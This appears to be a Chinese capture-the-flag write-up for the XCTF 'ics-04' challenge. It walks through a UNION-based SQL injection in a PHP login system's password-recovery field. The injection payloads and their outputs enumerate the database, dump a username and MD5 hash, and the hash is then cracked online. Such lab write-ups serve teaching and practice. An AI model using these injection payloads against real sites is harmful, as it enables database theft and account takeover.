• 【XCTF】ics-04


    信息:

    题目来源:XCTF 4th-CyberEarth

    标签:PHPSQL注入

    题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag

    解题过程

    进入注册页面,尝试注册:

    ics-041

    进行登录:

    ics-042

    提示普通用户登录无用,猜测需要使用管理员等用户登录,获取flag。

    首先弱口令爆破(猜测考察弱口令的可能性小)。

    ics-045

    无果,尝试使用sql注入。

    对登录和注册的输入的逐一进行测试:

    ics-043

    在找回密码处,发现输入漏洞:

    ics-044

    在测试时还发现可以使用同一用户名重复注册。

    进行显示位测试,发现第三项正常显示。

    ics-046

    获取数据库名:

    username = dmin' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4 #
    [OUTPUT]:information_schema,cetc004,mysql,performance_schema
    

    获取表名:

    username = admin' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='cetc004'),4 #
    [OUTPUT]:user
    

    获取字段名:

    username= admin' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='cetc004' and table_name='user'),4 #
    [OUTPUT]:username,password,question,answer
    

    获取用户名密码:

    username= admin' union select 1,2,(select group_concat(username,'~',password) from cetc004.user),4 #
    [OUTPUT]:c3tlwDmIn23~2f8667f381ff50ced6a3edc259260ba9
    

    再次注册c3tlwDmIn23用户,密码随意,得到flag。

    https://www.somd5.com/

    密码的MD5:2f8667f381ff50ced6a3edc259260ba9。

    解密为:1qazWSXED56yhn8ujm9olk81wdfTG

  • 相关阅读:
    ClassLoader类加载器
    java反射(二)--反射应用案例
    java反射(一)--认识反射机制
    javaIO流(四)--输入与输出支持
    javaIO流(三)--IO深入操作
    javaIO流(二)--字节流与字符流
    javaIO流(一)--File类的基本使用
    python文件读写
    python的logging模块
    查看python版本
  • 原文地址:https://www.cnblogs.com/chalan630/p/13231355.html
Copyright © 2020-2023  润新知